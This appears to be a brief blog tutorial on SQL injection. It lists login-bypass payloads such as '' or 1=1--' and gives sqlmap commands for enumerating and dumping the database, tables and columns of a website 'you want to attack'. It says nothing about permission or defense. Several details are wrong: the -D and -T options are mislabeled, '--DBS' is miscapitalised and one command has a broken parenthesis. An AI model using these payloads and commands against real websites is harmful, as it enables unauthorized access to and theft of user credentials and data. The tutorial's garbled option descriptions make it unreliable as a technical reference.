What is SQL Injection & How to use SQL Map

SQL Injection is a type of an attack which is done on the websites to excess their sensitive data without any authority by adding any malicious content into the website called payload. By the SQL injection vulnerability, an attacker can bypass the login credential by putting some SQL cheat codes in it and can access all the data of the websites and the credentials of all the user of the website.

SQL Injection can also be used to add, modify and delete records in a database, affecting data integrity.

 

How SQL Injection can be done?

It can be done in two ways:

1. By using SQL cheat codes

• admin' --

• admin' #

• admin'/*

• ' or 1=1--

• ' or 1=1#

• ' or 1=1/*

• ') or '1'='1--

• ') or ('1'='1--

 2. By using SQL map

SQL map is  the tool in Kali Linux from which we can attack the website by using some commands like:

• sqlmap -u (link of the website on which you want to attack) --DBS

       By this command you will enter in the database of the website

• sqlmap -u (link of the website on which you want to attack) -D (table name) --tables 

       This command will help you to enter in a specific table.

• sqlmap -u (link of the website on which you want to attack) -D (table name) -T (column name) --columns

This command will help you to enter in the specific column of the specific table.
• sqlmap -u (link of the website on which you want to attack) -D (table name) -T (column name-C (specific column) --dump

By this command you will get into the database of the website.